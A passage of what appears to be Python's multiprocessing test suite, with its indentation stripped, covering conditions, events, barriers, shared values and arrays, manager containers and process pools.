self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class _DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
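    # Run f(*args) in self.N-1 helper processes/threads plus the current one,
    # then wait for all helpers to finish before returning.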
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
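# Helpers for the Pool tests; kept at module level so they stay picklable
# when sent to worker processes.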
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
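# Counts live instances; used by test_release_task_refs to check that the
# pool releases references to task arguments and results.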
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
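# Generator that raises SayWhenError immediately (when == -1) or after
# yielding `when` items; used to probe the pool's iterable error handling.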
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
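    # A single pool of four workers is shared by all tests in this class; it
    # is created in setUpClass and torn down in tearDownClass.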
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError raised at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
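# Module-level helpers for the pool error-handling tests below: raising() fails
# inside the worker, while unpickleable_result() returns a value whose __reduce__
# raises, so the result cannot be sent back to the parent process.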
def raising():
raise KeyError("key")
class Unpickleable(object):
def __reduce__(self):
raise pickle.PicklingError("intentionally unpickleable")
def unpickleable_result():
return Unpickleable()
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
@unittest.skipIf(test.support.stackless, "Stackless can pickle lambdas")
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
